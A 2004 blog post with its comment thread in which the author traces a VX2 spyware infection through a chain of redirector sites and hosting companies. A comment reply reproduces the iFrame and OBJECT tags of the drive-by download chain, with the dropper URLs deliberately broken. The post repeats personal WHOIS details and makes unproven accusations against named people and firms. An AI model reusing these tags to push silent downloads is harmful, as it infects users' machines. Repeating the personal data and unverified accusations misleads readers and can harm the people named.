Log in

No account? Create an account

Previous Entry | Next Entry

[EDIT] This particular post has generated a very large amount of email, and apparently is being read by a large number of people infected with VX2. As a result, I've edited it, to clean up typos and to add additional information about the exploits used, the way VX2 works, and the sources of the spyware scourge. New information is identified with [EDIT].

If you're reading this post and you're on a Windows computer, the odds are overwhelming--between 80% and 90%--that you are infected with at least one virus or spyware program, and the odds are very high that you're infected with dozens or hundreds.

Yes, you. Even if you are technically literate, you have a firewall, and you never download suspicious attachments, you are almost certainly infected. There is lots and lots and lots of money in computer viruses and spyware, especially the variety that makes popup ads appear on your machine. The question I've always had, though, is who's making all this money by infecting your computer?

A couple nights ago, Shelly's computer became infected. Shelly's technically savvy, the apartment we live in is on a closed private network with a hardware firewall between us and the Internet, and she also runs a software firewall on her computer, and she still became infected nonetheless.

I spent about six hours removing the infection, and also tracking down the source of the infection, and painstakingly backtracking all the popup ads that the adware displayed on her computer. My goal: Follow the money. Discover where the infection came from, and who was making money from it. The results were, to say the least, interesting.

If you don't care about stuff like this, you can skip the rest of this message. If you're curious about the mechanisms by which spyware and viruses work, who is responsible for them, why they're so common, how they spread, and most important, who makes money by creating and releasing them:

Shelly's computer started behaving strangely, taking a long time to boot and displaying popup ads whenever she launched Internet Explorer, late Wednesday afternoon. Running the anti-spyware program Ad-Aware revealed that the computer was infected with a very nasty bit of malware called VX2, first introduced to the Internet public by a company calling itself VX2, which has since become defunct. The VX2 program has continued to be developed and to become nastier, more destructive, and more malicious as time goes on; today's VX2 is extremely sophisticated, highly destructive, and almost impossible to remove.

Ad-Aware and a similar program called Spybot Search & Destroy could see the infection, but could not remove it. VX2 remains memory-resident, even if its files are deleted, and constantly monitors attempts to get rid of it; if it is removed or the computer's Registry is changed, this evil little bastard changes the Registry back and rewrites itself to disk under a different name. It also sets itself up as a critical system service (so it runs even when the computer is booted in safe mode), and cloaks itself so that it does not appear in the Task Manager. [EDIT]: Earlier versions of VX2 could only conceal themselves in the Task Manager under Windows 95/98/Me; VX2 Variant 3 appears to be able to conceal itself in the Task Manager under Windows NT/2000/XP as well.

Ad-Aware has a special plug-in module written especially to remove VX2. This plug-in confirmed that Shelly's computer was infected with what it described as "VX2 Variant 3," but even the plug-in could not remove the infection; it appears that Shelly had become infected with a brand-new VX2 variant, more cunning and more malicious than even the worst variant known to Ad-Aware.

But from where?

Now things get interesting. In following the source of the infection, I ended up in a virtual trip that went from Dallas, Texas, through servers in Russia and Nevada, and finally back to the source in Rosemount, Minnesota. Along the way, it involved a surprising number of big-name, supposedly reputable companies, all of whom are profiting either directly or indirectly from viruses and spyware.

Shelly's computer first became infected when her browser visited the Web address " normal/yyy12.html". At the time I am writing this, this Web address is still active. *** WARNING *** WARNING *** WARNING I have put a space in this URL to keep people from clicking accidentally on it. Do NOT visit this URL if you are on a Windows machine and you're using Internet Explorer. You WILL become infected. I don't know what brought her to that site; it may have been a redirect, a browser hijack, even a maliciously constructed banner ad.

[EDIT]: The site infects a computer using an Explorer iFrame exploit. Put most simply, if a Web page contains an iFrame that points to another Web page containing an OBJECT tag, the file referenced in the OBJECT tag (in this case, a dropper for VX2) is downloaded and installed silently, without the user's knowledge or consent. Versions of Internet Explorer prior to the version that shipped with Windows XP SP2 are all vulnerable; I have not tested the version of Explorer that shipped with XP SP2 or versions patched by subsequent security fixes. I do know that Microsoft has since closed several iFrame exploits. I do not know if this exploit is one of them.

The Web site at is running on a computer whose ISP connection is provided by a company called Rackspace, a large and busy Texas-based ISP with international offices and a long history of supporting and condoning spam and other unethical behavior; in fact, Rackspace even has its own entire section on the Blackholes.us spam support blacklisting service.

So Rackspace is the first company profiting from the infection; they're making money by providing Internet connections for the URL hosting the malware dropper. Remember the name Rackspace; we'll be seeing it again later.

So. Moving along: The virus-dropping Web site at is nothing but a simple redirector. It redirects to " ads/banners/banner3.php?ID=1". Again, I have put a space in this URL. Do NOT visit this URL if you are on a Windows machine and using a vulnerable version of Explorer; you WILL become infected. [EDIT]: This page is referenced by an iFrame from the preceding page, and contains an iFrame pointing to the next server in the chain, which contains the actual dropper; we'll get to that in a moment.

This Web site is hosted on a server in Russia; the ISP is a Russian service called Linkey.ru. They are the second group of people in the chain making money from viruses and spyware, by hosting a virus dropper. I don't know if they're a knowing participant or just an innocent ISP who's unknowingly hosting a virus dropper. [EDIT]: Additional information from a helpful reader on the news.admin.net-abuse.email newsgroup:
The Russian-hosted Web site is: = Adsavior.com
11/08/04 11:05:06 dns Adsavior.com
Adsavior.com NS (Nameserver) ns1.adsavior.biz
Adsavior.com NS (Nameserver) ns2.adsavior.biz
Adsavior.com A (Address)
mail.Adsavior.com A (Address)
ns1.adsavior.biz A (Address)
ns2.adsavior.biz A (Address)
Adsavior Inc.
James Finlayson
#395-1027 Davie St.
Vancouver, BC V6E4L2
Phone: 6046969057
Email: jamesinflames69@hotmail.com
Registrar Name....: Register.com
Registrar Whois...: whois.register.com
Registrar Homepage: http://www.register.com
Created on..............: Thu, Sep 16, 2004
Expires on..............: Fri, Sep 16, 2005
Record last updated on..: Mon, Oct 04, 2004
It appears that linkey.ru and IPs in the same general block as "Adsavior.com" are well known for Net abuse. Mr. Finlayson, another Canadian, appears to be deeply involved in this particular virus/adware gang as well.

Onward and upward: The Russian virus host itself is also nothing but a redirector. Clearly, the person responsible for the virus wants to put some distance between himself and the virus; we've already gone through two redirectors in two countries. The Russian Web site contains an Internet Explorer iFrame exploit which causes Internet Explorer to load a program from the URL "http://www.xzoomy.com/ stc.php?stid=007". Once again, I have put a space in the URL; if you visit this Web site, and allow your browser to download the executable that it references, you'll be infected with VX2.

Now we're getting somewhere. The xzoomy.com Web site is a search engine that's well-known in anti-virus and anti-spyware circles. Xzoomy.com makes a small profit every time someone uses their Web page to do a search; they have a long and ignoble history of attracting visitor through the use of spyware, adware, and viruses. They've been responsible for their own spyware/adware software, and they've got their hands in an Internet gambling site called "free scratch and win" as well. These guys are looking more and more like our scumbags, eh? This site is registered to:

Mike Cass (domains@adscpm.com)
Fax: +1.0000000000
181 Coniston St
Winnipeg, MB R2H1P8

So Mike Cass is up to his ears in this mess. Mike's Web site, well-known for being the source of spyware and adware, is hosted by an ISP called Peer 1 Network, an outfit in Montreal known to be indifferent to spammers. Mike and Peer 1 Network are making money here--Peer 1 by hosting Mike's Web site in spite of the fact that it's known to be associated with adware and spyware, Mike because he makes money every time someone visits his site. But wait, there's more!

The xzoomyy.com Web site is another redirector. It redirects to "http://www.2nd-thought.com/ files/install007.exe" (I've put a space in the URL); and it loads and executes the Windows program install007.exe from the 2nd-thought.com Web site by using an OBJECT tag. [EDIT]: This file, install007.exe, is the actual executable that installs the adware. If you're using Explorer for Windows and you visit any of the pages before this in the chain, install007.exe downloads and runs silently without prompting you, because the OBJECT tag that references it is contained inside an iFrame. This is also why other browsers are safer; they don't recognize the iFrame tag.

The program install007.exe loads and runs as soon as the browser hits that page; the computer's owner never gets any warning and has no opportunity to stop it. As you may have guessed, install007.exe installs VX2 on the victim's computer.

Note that all this--the numerous redirects, downloading the program from the 2nd-thought Web site, installing the VX2 virus--all happened automatically and silently; at no point is the computer owner aware of what is going on, and at no point does the computer owner know that a virus is being loaded onto his computer.

2nd-thought.com is the primary villain here. They are hosting the installer itself; they are the people actually placing VX2 on the victims' computers without permission or notification. Let's take a look-see and find out who these guys are:

Domain name: 2nd-thought.com

Registrant Contact:

Don Lativalle (abuse@2nd-thought.com)
Fax: +1.0000000000
3597 boul St-Jean
Dollard des Ormeaux, H9X2B5

Well, lookit that, another Canuck. What is up with Canadian spyware and virus profiteers, eh? Does Canada have particularly lax computer-crime laws?

2nd-thought.com is hosted by Peer 1 Networks as well. 2nd-thought.com is also a well-known scourge on the Internet, notorious for releasing a spyware program that changes your home page to their page, and for redirecting search engine searches you do to porn sites. That's two scumbags with long histories of Internet abuse, both hosted on Peer 1 Networks and both, apparently, now working together. Mike Cass, Don Lativalle, and Peer 1 Networks: three people or organizations with shady pasts and questionable ethics, three people or organizations who are apparently involved with loading VX2 onto Shelly's computer.

So now we know how VX2 ended up on Shelly's computer. We know what people are responsible, we know what businesses support and profit from them, and we know they've gone to a whole lot of trouble and effort to hide themselves. We know that the people, Mike Cass and Don Lativalle, have histories of releasing spyware and adware to infect people's computers, we know they run for-profit Web sites, and we know that they have independently established histories of using dubious and unethical practices to get traffic to those Web sites. We know they're both Canadian, we know they have found a Canadian ISP in Peer 1 Networks willing to turn a blind eye to outrageous network abuse, and we know that they appear to have teamed up to spread an extremely malicious variant of a program already known for being almost impossible to get rid of.

What's left is discovering the </i>why.</i> What's the mechanism by which they make money? How do they profit from infecting you with VX2? Where does the money come from, and where does it go?

For that, I had to turn to the actions that this VX2 variant takes once it's infected the computer, and to the ads it serves up.

This particular strain of VX2 does two things. First, it carries a payload unusual for adware; it loads another adware program called Bargain Buddy. Bargain Buddy's Web site is at cashbackbuddy.com, which is hosted by Globix, a Web-hosting company headquartered in the United Kingdom.

The cashbackbuddy.com Web site attempts to get people to deliberately infect themselves with the Bargain Buddy scumware by telling them "the new Software helps the end-user maximize his/her savings and gain cash back commissions from purchases made at all participating on-line and some offline merchants" (and so on, and so on). CashBackBuddy and its scumware is operated by an outfit called eXact Advertising:

eXact Advertising
101 W. 23rd Street, PMB 2392
New York, New York 10011
United States

eXact Advertising owns a number of different Internet properties, including pay-for-placement search engines, Mail.com, a personals Web site called "luvbandit," and so on.

The Bargain Buddy software is pretty straightforward: every now and then, it loads an ad on the victim's computer. Each time an ad is served, eXact Advertising makes a few cents from the advertisers who pay for the ads. Some of this money goes to Bargain Buddy "referrers;" the rest is profit.

So what that means is that if I sign up with eXact Advertising, then I get you to put the Bargain Buddy adware on your computer, every time an ad pops up, the advertiser pays eXact Advertising some money, and eXact Advertising pays me some money.

eXact Advertising claims to be "opt-in;" they say the only way you'll get Bargain Buddy is if you explicitly sign up and put it on your computer voluntarily. They lie, of course; the fact that they're doing businesses with referrers such as Mike Cass and Don Lativalle, who use very sneaky ways indeed to get the software onto your computer, proves it. They pretend to be good guys helping consumers save money; in reality, they don't care so long as people can be cajoled, tricked, or forced into installing their software, with or without their consent.

So. Now Shelly's computer is infected with two adware programs: Bargain Buddy by eXact Advertising, who is paying the people responsible for the infection, and a custom version of VX2, which prevents itself from being removed easily, installs Bargain Buddy, and also serves ads on its own.

Now popup ads are popping up all over the place. Some of them are from eXact Advertising, a shady company that's written its own custom adware. Some of them are from VX2 itself. It's the latter ones, the ones that VX2 is generating, that are the most interesting.

VX2 brings in ads from, of all places, Revenue.net, a very large mainstream online advertising broker that serves up banner ads, popup and popunder ads, and contextual ads for a lot of big-name clients. Revenue.net does serve popup ads and popunder ads, primarily from Web sites rather than adware. The ads being brought in from the VX2 infection were being pulled from Revenue.net; the persons responsible for the VX2 infection were Revenue.net affiliates.

I fired off an email to Revenue.net, with the URLs of some of the popup ads being pulled in by the virus. Revenue.net, rather to my surprise, actually responded, and claimed that the affiliate code attached to the popup ads appearing on Shelly's computer belonged to an outfit calling itself "look2me.com".

Look2me.com is--surprise surprise--a Web advertising company that makes money from popup ads. Look2me.com is a Revenue.net affiliate; Look2me.com gets people to view ads produced by Revenue.net, the advertiser pays Revenue.net, who then pays a percentage of the take to look2me.com.

Look2me.com is hosted by...wait for it...Rackspace! Told you their name would pop up again.

Look2me.com is owned by:

NicTech Networks info@look2me.com
3860 W 150TH ST
Rosemount, Minnesota 55068
United States

NicTech Networks also owns a dating service called "SimilarSingles.com". Sound familiar? eXact Advertising, based in New York, is an Internet advertising company that serves popup ads on virus-infected computers and also owns an online dating service. NicTech Networks, based in Minnesota, is an Internet advertising company that serves popup ads on virus-infected computers and also owns an online dating service. Two well-known and unethical Canadians, Mike Cass and Don Lativalle, each with separate histories of profiting from adware and malware, are jointly responsible for a computer infection which serves popup ads from eXact Advertising and NicTech Networks. NicTech Networks is hosted by Rackspace; the initial point of infection of the virus is a Web site hosted by Rackspace.

Rackspace is looking pretty bad here. In fact, Rackspace and Peer 1 Networks are both obviously dirty; both are up to their elbows in hosting and providing services for people who make money by serving popup ads through viruses and malware. It's hard to argue that either Rackspace or Peer 1 Networks is simply being duped by a client, particularly in light of the fact that emails to both outfits concerning this situation go unanswered, and in light of the fact that the virus-dropping Web site is still up three days after I've emailed the responsible hosts. [EDIT]: After complaining to both ISPs, I still have not had a response from either. As of this writing, neither Rackspace nor Peer1 has taken any action against the Web sites named in this report.

So. Advertisers pay eXact Advertising and Revenue.net. eXact Advertising and Revenue.net then go on to pay affiliates who have infected target computers with malware to serve up the ads. The affiliates host their virus-dropping Web sites, along with Web sites that profit in other ways from viruses and malware, on Canadian ISP Peer 1 Networks and American ISP Rackspace.com. The money goes from the advertisers to eXact Advertising and Revenue.net; some of this money then goes to the affiliates, who infect the computers with malware; some of the money the virus-spreaders make in turn goes to Peer 1 Networks and Rackspace, who turn a blind eye to what their clients are doing. But where does the money originate? Obviously, the advertisers are only buying ads because they think the ads will work; that means, somebody is clicking on these popup ads and buying the advertisers products.

But who on earth would spend money on an annoying popup ad? What could possibly induce someone to take out his wallet when everyone knows that virus-spawned popup ads are among the most annoying things on Earth?

Ah, that's the pure genius of it--that's the brilliance of the scheme, honed to a fine edge. The popup ads you get when you're infected with VX2? They advertise...

...spyware removal and popup blocking tools.


( 161 comments — Leave a comment )
Page 1 of 5
<<[1] [2] [3] [4] [5] >>
Nov. 7th, 2004 10:46 am (UTC)
You are my hero :)
Nov. 7th, 2004 01:33 pm (UTC)
Great writeup. Makes it pretty obvious why one might want to consider using another browser, eh? (or, for the extreme, perhaps a different operating system? :)
Nov. 8th, 2004 10:07 am (UTC)
Yep. As a result of this problem, I think I'm installing another browser, possibly Firefox, on Shelly's computer this evening.

I use Windows, Linux, MacOS, and other operating systems--unfortunately, some applications (such as games) require using Windows. My primary machines are Mac and Linux systems, though; i try not to keep anything vital on my Windows machines, in case I have to wipe 'em. Unfortunately, Shelly doesn't have that luxury.
(no subject) - uberjay - Nov. 8th, 2004 11:50 am (UTC) - Expand
(no subject) - athelind - Nov. 17th, 2004 06:50 am (UTC) - Expand
(no subject) - shermel - Nov. 17th, 2004 07:19 am (UTC) - Expand
(no subject) - silentemotion - Nov. 17th, 2004 12:06 pm (UTC) - Expand
(no subject) - newsedition - Nov. 17th, 2004 07:44 am (UTC) - Expand
(no subject) - silentemotion - Nov. 17th, 2004 12:06 pm (UTC) - Expand
(no subject) - scixual - Nov. 17th, 2004 01:37 pm (UTC) - Expand
(no subject) - apotheon - Dec. 23rd, 2004 11:26 pm (UTC) - Expand
(no subject) - arashikurobara - Dec. 30th, 2004 09:32 pm (UTC) - Expand
(no subject) - (Anonymous) - Feb. 22nd, 2005 03:14 am (UTC) - Expand
Nov. 7th, 2004 02:52 pm (UTC)
First of all, I'm going to do some investigating on my own. Like calling the local police station and inquiring about their dealings with computer crimes and what falls under the definition of such. See, it's interesting -- both Mike Cass and Don Lativalle have phone numbers that resolve to Rogers AT&T cellphones. Interestingly enough, despite Don's address being on the outskirts of Montreal, his phone claims he's my neighbour -- out in London, ON. Not sure what that indicates, but just an interesting fact.

I'd also be most curious to know the technical details of how you've traced it through that many hops. If you don't mind sharing, of course.
Nov. 8th, 2004 10:16 am (UTC)
Not at all!

I found the initial point of infection-- looking in Shelly's Explorer history file, which retains even redirects. From there, I visited the site on my MacOS X machine using Safari, which allows me to view the source code of a page even if the page has one of those damn stupid Javascript things designed to prevent me from doing so.

That page's source is nothing more than a single tag, without even HTML, HEAD, or BODY tags:

IFRAME SRC=" ads/banners/banner3.php?ID=1" height="0" width="0" SCROLLING=no MARGINHEIGHT=0 MARGINWIDTH=0 FRAMEBORDER=0/ (note that I've inserted a space in the URL within the IFRAME tag).

So I manually visited that page with Safari; its source is likewise a single iFrame tag:

iframe src=http://www.xzoomy.com/ stc.php?stid=007 width="1" height="1" frameborder="0"

the source of THAT page is a single OBJECT tag, as follows:

object id=install classid="CLSID:13197ACE-6851-45c3-A7FF-C281324D5489" codebase="http://www.2nd-thought.com/ files/install007.exe" (mind the space in the URL, as usual).

Install007.exe is, as you can guess, the actual executable for the malware.

The rest was a matter of using dig, traceroute, and whois searches. Whois on "xzoomy.com" produced the name Mike Cass; whois on "2nd-thought.com," the actual host of the malware dropper, prodiced the name Don Lativalle. Dig and traceroute turned up Rackspace and Peer 1 as the hosts of the named Web sites.

Given the lengths to which they've gone to hide their involvement, using redirectors scattered all over the place, it's not one bit surprising to me that they're using cell phones as their contact phone numbers, or that their contact addresses in the Whois registry might not be real.

Viewing HTML Source Safely - (Anonymous) - Nov. 9th, 2004 08:09 am (UTC) - Expand
Re: Viewing HTML Source Safely - tacit - Nov. 9th, 2004 09:57 am (UTC) - Expand
Lynx for Macs - gleef - Nov. 17th, 2004 06:16 am (UTC) - Expand
Re: Viewing HTML Source Safely - (Anonymous) - Nov. 9th, 2004 01:01 pm (UTC) - Expand
Re: Viewing HTML Source Safely - k_timebomb - Nov. 27th, 2004 01:19 pm (UTC) - Expand
Re: Viewing HTML Source Safely - (Anonymous) - Dec. 12th, 2004 11:22 am (UTC) - Expand
Re: Viewing HTML Source Safely - k_timebomb - Dec. 12th, 2004 12:26 pm (UTC) - Expand
Nov. 7th, 2004 03:24 pm (UTC)
Thank you.
Nov. 7th, 2004 03:24 pm (UTC)
Any chance of prosecuting the sons of bitches?
Nov. 8th, 2004 10:19 am (UTC)
Unlikely. Knowing that someone has committed a crime and proving it in court are two diffeent things, especially in light of the fact that they appear to be in Canada and I'm in the US. It's not even entirely clear that what they're doing violates Canadian or US law, though clearly it should.

What I'd like to do is send them a bill for the time it took me to clean up the infection. I doubt that'd work, though.
(no subject) - selki - Nov. 17th, 2004 11:26 am (UTC) - Expand
(no subject) - cowgod77 - Nov. 17th, 2004 11:43 pm (UTC) - Expand
Nov. 7th, 2004 05:24 pm (UTC)
That's a fascinating journey -- it was like reading Clifford Stoll's The Cuckoo's Egg.
Nov. 17th, 2004 01:50 pm (UTC)
I was thinking the same thing.

I used to do something similar on the college library. I would trace back who installed software that shouldn't be there. It eventually started to lead to a group of young men. They turned out to be crackers. They'd managed to gain root on a couple of our servers. The most we were able to do to them, though, was to ban them from the lab, since the dean was friends with one's mother. *shrugs*
(no subject) - vvalkyri - Nov. 18th, 2004 07:11 am (UTC) - Expand
indeed! - (Anonymous) - Apr. 15th, 2006 09:57 pm (UTC) - Expand
Nov. 8th, 2004 12:02 am (UTC)
when I take over the world, you will be appointed my minister of "hunting people down so I can have them tortured, maimed, then left bleeding from open wounds in a horribly dirty cell filled with infectious bacteria."

you are a good man, Franklin. Highly useful.
Nov. 8th, 2004 10:20 am (UTC)
But I'm working on taking over the world myself! Muh as I would love that job, I think I'd rather rule the world with an iron fist on my own... :)
Nov. 8th, 2004 05:05 am (UTC)
are we safe?
I have a mac and Bu has a lynux... does this mean we are uninfected?
Nov. 8th, 2004 10:20 am (UTC)
Re: are we safe?
Yes. If you're running MacOS or Linux, you don't have to worry about this sort of thing. :)
Re: are we safe? - (Anonymous) - Nov. 9th, 2004 05:26 am (UTC) - Expand
Re: are we safe? - tacit - Nov. 9th, 2004 09:45 am (UTC) - Expand
Re: are we safe? - (Anonymous) - Nov. 9th, 2004 08:43 pm (UTC) - Expand
Re: are we safe? - tacit - Nov. 10th, 2004 12:10 pm (UTC) - Expand
Re: are we safe? - makovette - Nov. 17th, 2004 07:43 am (UTC) - Expand
Nov. 8th, 2004 06:40 am (UTC)
Re: virii
Makes me want to try setting up a system under vmware with my current anti-viral, anti-spyware solutions and try visiting those sites...
Nov. 8th, 2004 10:21 am (UTC)
Re: virii
That'd be a very, very interesting experiment. if you do, let me know what happens!
Re: virii - wolfieboy - Nov. 14th, 2004 03:52 am (UTC) - Expand
Nov. 8th, 2004 08:24 am (UTC)
I don't know what brought her to that site; it may have been a redirect, a bgrowser hijack, even a maliciously-constructed banner ad.

VX2 got onto my system through the MSN toolbar. It's a stealth installer that can come in piggybacked on dozens of things. I've got two others, at the moment, that come in off of Yahoo and Google's toolbars respectively.

(Unfortunately, I can't disable either of those as I need them to run testing on our software as our users install them all the T*!#)*&!#&(*#!%^) time. The only way I've gotten around their services is to leave Spybot's agent running and it will tell you whether anything's attempting to change the registry and running Webroot's spyware software package that notifies you and allows you to disable it.

My current programs for spyware that are running as agents:

Ad-Aware (for removal only)
SpyBot S&D (agent running)
Pest Patron (agent running)
Webroot's Spy Sweeper (agent running)

Just as FYI, since you probably know most of it. :)

Nov. 8th, 2004 10:24 am (UTC)
In this particular case, neither Ad-Aware nor Spybot S&D could remove the infection. Ad-Aware has a special plugin just for VX2, and the plugin identified "VX2 Variant 3" on the computer and claimed to remove it, but didn't. That's why I suspect that what this was is some new variant on VX2 that's designed to evade current VX2 cleaners.

I haven't tried Pest patron or Spy Sweeper. I suppose I could reinfect the computer and give them a go, but all things considered, I'd rather not. :) It would, however, be helpful to know whether either of them can deal with this VX2 variant.
Typo - animakitty - Nov. 17th, 2004 07:08 am (UTC) - Expand
Nov. 8th, 2004 12:12 pm (UTC)
Spectacular bit of netrunning. This is like the game Uplink, only real. :-)

Magnificently done, sir. If, despite my efforts, you *do* manage to conquer the world, I think I'd like to apply for the job of leading your strike team to burn these people to the ground.
Nov. 8th, 2004 12:14 pm (UTC)
Oh, and great testimonial for the virtues of MacOS/Safari (or Linux/FireFox, for that matter) over Windows/IE. IT managers should read this.
Nov. 8th, 2004 01:23 pm (UTC)
Nice followback through the networks.

I followed your link from NANAE but what I found humourous was that this type of post violates the LJ TOS.
(Deleted comment)
Re: Nice. - schmuckythecat - Nov. 9th, 2004 07:48 am (UTC) - Expand
(Deleted comment)
Re: Nice. - schmuckythecat - Nov. 9th, 2004 08:14 am (UTC) - Expand
Re: Nice. - tacit - Nov. 9th, 2004 09:55 am (UTC) - Expand
Re: Nice. - schmuckythecat - Nov. 9th, 2004 10:07 am (UTC) - Expand
Re: Nice. - hugh_mannity - Nov. 17th, 2004 07:30 am (UTC) - Expand
(Offtopic) - k_timebomb - Nov. 27th, 2004 01:26 pm (UTC) - Expand
Re: Nice. - schmuckythecat - Nov. 9th, 2004 08:19 am (UTC) - Expand
Re: Nice. - tacit - Nov. 9th, 2004 09:46 am (UTC) - Expand
Re: Nice. - schmuckythecat - Nov. 9th, 2004 10:07 am (UTC) - Expand
Nov. 9th, 2004 12:28 pm (UTC)
Additional information from a helpful reader on the news.admin.net-abuse.email newsgroup:
The Russian-hosted Web site is: = Adsavior.com

11/08/04 11:05:06 dns Adsavior.com
Adsavior.com NS (Nameserver) ns1.adsavior.biz
Adsavior.com NS (Nameserver) ns2.adsavior.biz
Adsavior.com A (Address)
mail.Adsavior.com A (Address)
ns1.adsavior.biz A (Address)
ns2.adsavior.biz A (Address)

Adsavior Inc.
James Finlayson
#395-1027 Davie St.
Vancouver, bc V6E4L2
Phone: 6046969057
Email: jamesinflames69@hotmail.com
Registrar Name....: Register.com
Registrar Whois...: whois.register.com
Registrar Homepage: http://www.register.com
Created on..............: Thu, Sep 16, 2004
Expires on..............: Fri, Sep 16, 2005
Record last updated on..: Mon, Oct 04, 2004

It appears that linkey.ru and IPs in the same general block as "Adsavior.com" are well known for Net abuse. Mr. Finlayson, another Canadian, appears to be deeply involved in this particular virus/adware gang as well.

Nov. 9th, 2004 12:38 pm (UTC)
Another followup, courtesy of a regular in the NANAE newsgroup:


This page describes another user's problem very similar to the one I dealt with on Shelly's computer, and confirms that Rackspace is dirty--they know what their clients are doing, and they approve and condone this activity. in particular, here is the text of a reply sent by Rackspace to another user who wrote to Rackspace and complained they were hosting virus droppers:

"From: abuse@rackspace.com [mailto:abuse@rackspace.com]
Sent: Friday, September 24, 2004 3:42 AM
To: steve
Subject: [Incident 040923-000056]

Recently you requested personal assistance from our on-line support center. Below is a summary of your request and our response.

If we do not hear from you within 48 hours we will assume your issue has been resolved.

Thank you for allowing us to be of service to you.


Suggested Answer
At 09/24/2004 03:42 AM we wrote -


Please send an email to info@look2me.com and ask for the uninstall script. If you would rather give them a phone call, they can be reached at 866-705-2728. Please update this ticket if you do not hear back from them within 48 hours and we will contact the customer.

Sydney McHale
Rackspace Managed hosting (TM)"

I was right--Rackspace knows EXACTLY what's going on, but since Rackspace is making money on it, Rackspace doesn't care. Dirty, dirty, dirty.
Nov. 27th, 2004 01:20 pm (UTC)
Huh? I don't see how... did you do what they asked, first?
(no subject) - tacit - Nov. 29th, 2004 11:26 am (UTC) - Expand
(no subject) - k_timebomb - Nov. 30th, 2004 08:39 am (UTC) - Expand
Nov. 16th, 2004 11:31 pm (UTC)
Yes, you. Even if you are technically literate, you have a firewall, and you never download suspicious attachments, you are almost certainly infected.

Nope, sorry. I don't bother with a firewall or "antivirus" software, either. I don't know how everyone else gets so much of this stuff. Probably Outlook.

Do NOT visit this URL if you are on a Windows machine; you WILL become infected.

No, I won't. IE asks me if I would like to install something, and I say no. End of story. I'm using IE6 with more or less the default settings, and it's probably even a few patches behind the curve, since I haven't yet applied SP2 here. Perhaps you need to change "Download signed ActiveX controls" to something other than "Enable".
Nov. 17th, 2004 07:09 am (UTC)
"No, I won't. IE asks me if I would like to install something, and I say no. End of story."

Try it.

The iFrame exploit is an exploit that will cause Explorer to download and run any executable without asking you, even if you have instructed Explorer not to download ActiveX controls (or anything else). All versions of Explorer except the one that ships with XP ervice pack 2 are vulnerable; all will download and run executables without informing the user, regardless of the user's settings.

Many viruses and adware/spyware sread using this or other Explorer vulnerabilities. Are you sure you aren't infected? When was the last time you ran the virus check at housecall.trendmicro.com or ran ad-busting programs? You might just be surprised.
(no subject) - chronicfreetime - Nov. 17th, 2004 08:44 am (UTC) - Expand
(no subject) - parodie - Nov. 17th, 2004 09:14 am (UTC) - Expand
(no subject) - chronicfreetime - Nov. 17th, 2004 09:37 am (UTC) - Expand
(no subject) - aurora77 - Nov. 17th, 2004 01:54 pm (UTC) - Expand
(no subject) - chronicfreetime - Nov. 17th, 2004 02:59 pm (UTC) - Expand
(no subject) - scixual - Nov. 17th, 2004 01:52 pm (UTC) - Expand
(no subject) - chronicfreetime - Nov. 17th, 2004 02:58 pm (UTC) - Expand
Page 1 of 5
<<[1] [2] [3] [4] [5] >>
( 161 comments — Leave a comment )